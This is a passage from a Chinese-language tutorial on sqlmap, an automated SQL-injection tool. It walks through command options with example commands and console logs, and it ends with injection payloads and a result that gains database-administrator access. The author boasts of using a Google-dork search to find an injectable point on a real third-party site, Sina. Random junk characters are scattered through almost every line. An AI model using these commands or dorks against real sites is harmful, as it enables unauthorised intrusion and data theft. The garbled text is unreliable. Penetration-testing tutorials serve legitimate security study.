9 G3 E9 S# N; J1 H, @2 Z( X2、同时显示debug信息。8 I5 G/ J' A$ u/ f6 ~) ]/ m: d
+ x* Q% a# h! ]9 c- x! i
3、同时显示注入的payload。 ! z) t$ v* z1 P6 T $ b. a- p% z% k+ A9 J- d& ]! j4、同时显示HTTP请求。" l' B" ^. V g0 W" l1 a
) Y2 D' m" a: t+ [' ~) o
5、同时显示HTTP响应头。 ! X) L/ e' _+ v 6 j( w4 a R2 q& d" B1 Q6、同时显示HTTP响应页面。. I5 ~0 g! V% ^9 I
( r9 e: M& h/ `# q% ]
如果你想看到sqlmap发送的测试payload最好的等级就是3。' }, l6 J5 Q, {% `- ^! c) }
获取目标方式2 k: j2 T. ]5 A8 Y
目标URL & |3 C7 W/ Q2 E2 e 5 ^; K7 P% v+ [参数:-u或者--url$ C P9 L, L: H+ q$ p' E* s
@6 J) T6 G; P1 t, k' x
格式:http(s)://targeturl[:port]/[…] ) D4 D3 |7 Q4 v" C% T O) U4 ]- N! Y
例如:python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users 2 w' s @: `. d" e: i; A D9 @3 i9 \: ~3 m
从Burp或者WebScarab代理中获取日志8 H$ x- @ ]* f0 p2 i- x. K
0 _& h& s7 H+ @- A+ h. b
参数:-l 6 ^, p% r# L$ p1 Z' [! ~3 o! K% m & y( ]2 |3 e) ?可以直接吧Burp proxy或者WebScarab proxy中的日志直接倒出来交给sqlmap来一个一个检测是否有注入。( i- c* c4 s4 K7 C: ]' W9 h& _
从文本中获取多个目标扫描 9 h2 f) s" ~2 n, x3 j& y. P# f$ X, s 6 j( r8 x4 ^1 q, d3 v {参数:-m1 H$ b6 c7 p! d' C
* M$ M7 J- X5 d: h文件中保存url格式如下,sqlmap会一个一个检测 ( s# a$ E' K, m - K! o" z! o. uwww.target1.com/vuln1.php?q=foobar " b1 x) y7 |2 o. B5 K. ~ s5 z) C3 q( k) F
www.target2.com/vuln2.asp?id=1% B1 V: w. S& f
( G* A* B9 q" `0 f5 g. o# Zwww.target3.com/vuln3/id/1*. d9 y, H& a8 V& T- f% P+ Y
1 y& c5 a& @; D4 B+ Q8 R- \" g- s从文件中加载HTTP请求 3 N, [ ]+ _( m! k) ^% O . @5 q5 w# P7 _, p* y. Z参数:-r0 P: O4 S) r) m- C: p, n
6 \4 A! }5 J7 m' n$ dsqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。6 u E o* k- ?( D
0 b2 w! }5 U' c0 r" _" G比如文本文件内如下: 9 S, q# g2 p* ^9 Y ^$ C5 r7 X6 K2 x: \
POST /vuln.php HTTP/1.1: n# |# E1 x6 A
Host: www.target.com, n, L2 N$ p. B# W
User-Agent: Mozilla/4.0 # Y! v, \3 U2 C) `: Q+ S0 a& f% i ' s; C. D% d; M/ Kid=14 ^+ A1 `5 d$ d/ V! @$ r
& s% n9 P+ w' K' [4 L4 K; {当请求是HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443/ r# f' G9 R0 m7 H% T
处理Google的搜索结果 0 U* R# f! M K! c u% f. `# ], n# i2 ~) B1 g! [9 x( E
参数:-g 4 p8 w) H0 N T; x4 x# ?' ` v4 J) K5 o7 M# Osqlmap可以测试注入Google的搜索结果中的GET参数(只获取前100个结果)。 ! [' f1 T* I6 _ + i: w$ c) }/ G( k4 o例子: l3 X7 h1 e$ g% g, q
8 K9 N% w2 c/ r7 E
python sqlmap.py -g "inurl:\".php?id=1\"" 4 d2 P9 h7 D1 @. k7 Y5 x ; ~# h' G% J7 D5 F/ e v: o(很牛B的功能,测试了一下,第十几个就找到新浪的一个注入点) 6 e/ s+ I8 p' q6 s# c v$ c; M1 Y2 l8 I9 R$ w+ }8 O- D
此外可以使用-c参数加载sqlmap.conf文件里面的相关配置。 $ E# `2 s9 L& ]请求 3 i" _8 c% P% P& N3 z! n! E8 Qhttp数据 1 Y) c2 t, D5 I4 y7 v! u' D, k" H. k0 w% Z) k r+ I3 ~! f( R( D! B
参数:--data ( u" S0 A+ \& D 2 C' F3 w* m& z) y此参数是把数据以POST方式提交,sqlmap会像检测GET参数一样检测POST的参数。 # M4 c/ D& r8 q( n" [- {' ?- A6 w1 `8 t- Z
例子: & Q8 { F5 z8 Q ~- H . s7 g: L8 Z0 q+ ]" w" I. c7 Zpython sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users' x5 M* b3 ~, R" R
6 Z) B' _/ c, k. L" I! h/ A参数拆分字符 8 w. {2 z1 |& z7 A% C' v* B ) h) H) N3 k1 g2 u6 W; n参数:--param-del! ^! Y6 n# {( r0 }8 Z0 m
& H5 }; e- M) x9 Q8 Y
当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。1 X. U5 }. s: \( F/ K2 h
. ~9 h/ q) g) e, @! r
例子: . L0 Z' O/ D( a1 [. {- I 4 z, L5 j2 W o! G) r1 b$ D" upython sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users) ^* s% L; \- u+ y) m
) ^) }( I* ^+ I0 B3 T$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors7 K$ c% Z# j" |) d: S4 j+ D
[...]. j5 P+ L+ w. X9 f% W' l" S
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test : t% p9 c0 | j' R[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) 8 c# }3 o+ A2 k# E5 u( M0 s[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list. 5 p8 K3 M% ^. f2 A# H6 m<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'! N, U; ]0 Z' t
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)0 c9 U0 M2 m8 L* o$ [( G: N
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list. : ^1 Z! W# J8 C% L) C& y: }3 R<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' & ~/ o& w0 Y# y, V# `' @' C, T[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) . ^3 w0 B1 B/ i: L( V5 G# x8 M7 I! m[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.6 o3 b, I# }( g/ a4 O9 t/ S; [
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' 3 u/ `) Q; A7 y3 B: {" }[11:12:17] [INFO] target URL appears to have 3 columns in query9 i- K! c9 g( ^) `- q! F5 T. o( g
[...] ) S2 ^. y x, i' A- A" M) ~3 M2 B2 ?8 r: O# R: f8 w0 O
其他的一些参数 ; B) b x* r" ~$ q+ } u. C5 L4 Z- L使用参数缩写 $ o' W. H* z" c X' z* f' r0 |' e& e8 `) o9 [9 s
参数:-z ! f- B$ I, s9 D, g$ ]* V( k6 T9 b% d7 a: O [' c$ G; R7 E
有使用参数太长太复杂,可以使用缩写模式。 例如:# e, C( J6 f# u% t V$ O' [
3 X$ S" [" }" e; n4 c
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1" , _9 b; @0 I5 d$ b6 C
- f% z. [3 x& s5 w8 Q# ?例如: 2 A0 V; y8 R( H' I- ?, c $ c A/ l& m5 y4 t+ c$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile / u& Q) {4 g; v4 [7 y! a8 ^$ t[...]* _( ?! T1 d8 B& ^" y1 N5 [% P
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?* _0 x* t0 ]* H( v
[1] Apple iPhone 4s (default) 2 R0 x/ N5 a( z1 c5 Y[2] BlackBerry 99002 n! D4 G/ @* \8 H: ^- M
[3] Google Nexus 7 % ~0 A! n/ W, h/ t' ^ v[4] HP iPAQ 6365 * S# z! q' W% }, F% u+ `[5] HTC Sensation 8 w+ S' \# D* N; V[6] Nokia N97 , ]" E3 Y! g6 w: }* M" b4 w[7] Samsung Galaxy S6 t3 V" ?- ^, m( x5 P0 o6 v
> 1' ~- f# z( \ x9 F/ s) V' q
[...] , y, Z! v% u5 w$ k$ W4 T M% c: x) Y4 i* F: S
安全的删除output目录的文件 9 q T7 e- |1 B; K( K$ a0 A2 M* h % ~. O, [' r9 C0 v7 L3 N参数:--purge-output 7 `5 u$ T1 z" a* U4 R4 O9 c" J1 `. n& G! O. ~
有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。* p/ P% s% l* e5 [; h$ v
+ e# S5 n( ?# N* M( C例如:# m1 Y) c7 A7 O! |' h/ g
6 [. A" q$ J4 y9 H& S1 e$ T
$ python sqlmap.py --purge-output -v 3 / I& |' x0 K3 [( j% o9 G7 x- E[...]9 T9 P9 i7 Y3 ?9 f- t5 F
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...6 I9 y* J# z3 I, p* G
[xx:xx:55] [DEBUG] changing file attributes 2 l+ Q! K! @3 f/ ?5 n/ u, a) q[xx:xx:55] [DEBUG] writing random data to files$ {# b$ C& S5 B! L. Z
[xx:xx:55] [DEBUG] truncating files* i- X7 V8 x" H
[xx:xx:55] [DEBUG] renaming filenames to random values , R, M# r* C" e6 k2 h1 h l: S[xx:xx:55] [DEBUG] renaming directory names to random values' ~' t2 p1 B1 J/ a0 V4 x
[xx:xx:55] [DEBUG] deleting the whole directory tree x. k3 a% s9 b* c
[...]' D, H: L+ T) L: g/ Z% u
: V3 e" s2 i/ Q3 j启发式判断注入 & P7 G* Z! D$ e" ]+ ]2 O* h# W' P6 u! @5 P
参数:--smart9 f/ [2 N- i$ V @0 v9 P
: l# H v$ J3 K8 j& }0 G
有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。5 R0 Y- |+ ]9 b/ q2 [' o
5 ^; C. B( ?2 [% ~7 z
例子:0 ?5 F" h+ a- a! T1 w! W* g
: X' }- I$ N1 ^3 y! B1 B$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart 5 I; Q. b. N# e[...] - @* [0 F" {' q- d6 [7 \" ?2 r9 i[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic ) f/ q# d) q( k[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic6 I$ G: S ~5 H
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable 4 e& p! j: y& |- x9 ^3 }[xx:xx:14] [INFO] skipping GET parameter 'ca', l0 ?& a. a+ Q0 b/ |. X
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic4 s6 t6 q# \5 M3 ]" l
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic% @! L% d4 E& v+ I
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable M- I" ^4 Y/ P8 s
[xx:xx:14] [INFO] skipping GET parameter 'user'7 l( d& {) q! B
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic ) f% h8 D# \* H* M T6 U[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic6 |4 h5 _, [3 T# M5 _; M! ]
[xx:xx:14] [INFO] GET parameter 'id' is dynamic , N6 g8 y" L9 s8 E) \[xx:xx:14] [WARNING] reflective value(s) found and filtering out , L% C" j) H0 r3 d[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') / g; b3 A3 J6 |# W5 u! a[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'* J% r2 B* y' C1 ?" C( g9 g
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y / C) _; k0 B5 v% w* |. D6 Ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y2 C1 Y# b$ S- G+ Q
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'/ V3 a" S9 m5 W8 x# R p$ L
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 9 e% x4 z# R+ m' U. b
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'6 c" i5 R7 @$ B4 J5 G! f( r5 R
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable # U4 p2 j1 h6 G4 P4 ][xx:xx:14] [INFO] testing 'MySQL inline queries', c/ W9 ?3 L7 n2 G
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'0 {, K) M7 G# s) } L( y( }9 u
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' : S1 I) r5 R) g* z8 [# E4 x[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' a5 X* P6 D! J$ A/ j
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable * Y; N Q0 T, S7 R) i* @[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' * R& Z* L, o+ ]/ u0 {) ~8 H6 o[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found . Y7 ]" `' y. O: {9 k+ B[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test , X# F7 c# W$ l5 c8 O- s/ `! @% ~4 V[xx:xx:24] [INFO] target URL appears to have 3 columns in query. y6 ]; u8 A6 M
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable# n$ o- N& q6 `, R) ^) I, `
[...]% o* I6 Z* a/ r! O6 F% D) [2 Y
) n: i' _5 m) A
初级用户向导参数 ( R0 |0 s9 ~0 Z7 F$ i) o: f0 J$ Z, q4 j+ u( S& X+ m
参数:--wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。 5 U) t% f! {$ S 3 v. d8 U* H9 T$ python sqlmap.py --wizard / X6 l& u/ g. \" }; T' z, N9 s6 f( s- k! Z
sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool " X. O/ [6 ~7 t' C9 _3 U 7 }# H0 ^& V1 X5 i7 Y" ^" c- D* g% w2 uhttp://sqlmap.org : c; z5 @% M$ W" ?/ X7 L: g * ^) ~& p# \: ]% c; U q( a- c[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program5 D4 |# W% Y6 d
starting at 11:25:26 . D& O: W. R& Q2 r7 ~4 [4 D& h* }* g) f& R
Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=17 A2 o8 K8 t9 U& z, T8 Y
POST data (--data) [Enter for None]: ! R9 q9 z8 M l9 y: u. B
Injection difficulty (--level/--risk). Please choose:2 ]' C6 G! I6 E: P
[1] Normal (default) : h7 l, f: j: A5 T, k& R+ v[2] Medium 0 j7 h% |: a+ |# l; r# p: l/ f% V[3] Hard$ _, h5 [, @( s8 e( ]
> 1 ( ^ I; E8 s/ l6 v3 _+ f1 XEnumeration (--banner/--current-user/etc). Please choose: : e1 p' |8 C# J7 S2 M9 I6 j* [% ][1] Basic (default) 8 Q% B& J% z5 U; o( e' k[2] Smart 2 r& o1 M! q* K4 y! x/ V' _3 l[3] All3 z' Z* z- z% H* w" p
> 1 ( g7 J3 N3 C4 _, i 5 j8 x& }! A0 t5 B0 h Wsqlmap is running, please wait.. [" Z3 z: f$ Q% c/ f' f
3 J7 f' G$ n+ k1 o; K. Fheuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y8 A' \3 l& f8 S0 W0 G+ q' a
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y 5 X. O1 n" T- T) }GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N ) h2 I7 a4 \' H% R, xsqlmap identified the following injection points with a total of 25 HTTP(s) requests:. y9 y+ t' ?+ `+ T, |! H
---9 w& X) P3 |* |1 Q
Place: GET % |3 z5 x5 b5 ~7 X* k w+ c# z" LParameter: id # Y$ t5 O' ~8 ` a6 F# L Type: boolean-based blind # i% v# x7 J) e' f Title: AND boolean-based blind - WHERE or HAVING clause2 w! d9 F, l7 P8 @3 J, j" a
Payload: id=1 AND 2986=2986% b) o0 `# N) F8 z8 a$ t3 H
7 V! g4 _ ^5 O1 C0 N5 p2 Z
Type: error-based & H6 }. |/ `; Z% i% }& E# ^ ~ Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause" M* y) I% f4 @* `
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))), _8 w$ D+ h8 k
! a# y" F1 I+ j( A# ]* D1 ? Type: UNION query o/ p1 Z G3 R' h. P# H: C2 s
Title: Generic UNION query (NULL) - 3 columns $ h2 ] b4 g( o0 H! S y3 m% K Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- $ o9 s9 f' U J. y3 s
9 c7 x; X+ [7 r _( x1 ]* r; ?$ P
Type: stacked queries + g. l4 g8 A0 Q) P% K5 i9 a6 j Title: Microsoft SQL Server/Sybase stacked queries 5 [9 K/ ~: m) r$ G4 \1 | Payload: id=1; WAITFOR DELAY '0:0:5'--; |! U" T2 Q0 n1 w, A* c) ^, Y
* H% u4 @ @5 I, _- _ Type: AND/OR time-based blind 1 N( \! H5 C( j Title: Microsoft SQL Server/Sybase time-based blind8 ~% k& b8 a; x' g# a! W% q$ v
Payload: id=1 WAITFOR DELAY '0:0:5'-- $ J$ }1 W) V; X5 p1 n; x+ B 9 `7 K6 f2 r# r Type: inline query ! s, g& |9 x* C- I Title: Microsoft SQL Server/Sybase inline queries . E- V- d& I" R Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)) 3 x) _0 w, U6 P" d0 O A--- % T8 [( i; Y4 Y4 e J0 I* Y1 fweb server operating system: Windows XP ' l6 S7 F; [* g T8 s1 t! fweb application technology: ASP, Microsoft IIS 5.1 3 I2 V. W# H: j6 I9 `+ ?- ~% A4 c+ wback-end DBMS operating system: Windows XP Service Pack 2: f* }9 c5 s2 e
back-end DBMS: Microsoft SQL Server 2005# C9 b6 x3 u8 A$ Z
banner:: t, P9 v$ r; B* Z" A; C
--- - r! s8 ]4 L7 ^! c% j/ oMicrosoft SQL Server 2005 - 9.00.1399.06 (Intel X86) / o8 I9 t2 h& V- f8 s$ ~ Oct 14 2005 00:33:37 ( c9 B9 t3 T H9 U% s* X: T6 c
Copyright (c) 1988-2005 Microsoft Corporation, B+ _+ ? p0 _4 O3 z% A) E
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) . K. w: i6 z+ Z+ h--- ; p0 q2 H# V% f: `8 gcurrent user: 'sa' 5 i. l0 u. S( N5 T2 |7 ncurrent database: 'testdb'* {, s, V) t/ g7 C1 M/ k2 }, \
current user is DBA: True